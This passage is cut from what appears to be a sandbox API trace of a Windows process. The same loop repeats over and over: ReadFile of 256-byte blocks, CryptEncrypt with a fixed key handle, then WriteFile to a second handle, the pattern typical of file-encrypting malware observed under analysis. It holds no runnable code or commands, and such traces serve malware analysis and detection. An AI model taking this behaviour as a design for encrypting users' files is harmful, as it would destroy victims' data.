lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.762] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.762] GetLastError () returned 0x0 [0167.762] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.762] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.763] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.763] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.763] GetLastError () returned 0x0 [0167.763] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.764] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.764] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.764] GetLastError () returned 0x0 [0167.764] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.765] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.765] GetLastError () returned 0x0 [0167.765] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.765] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.766] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.766] GetLastError () returned 0x0 [0167.766] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.766] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.767] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.767] GetLastError () returned 0x0 [0167.767] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.767] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, 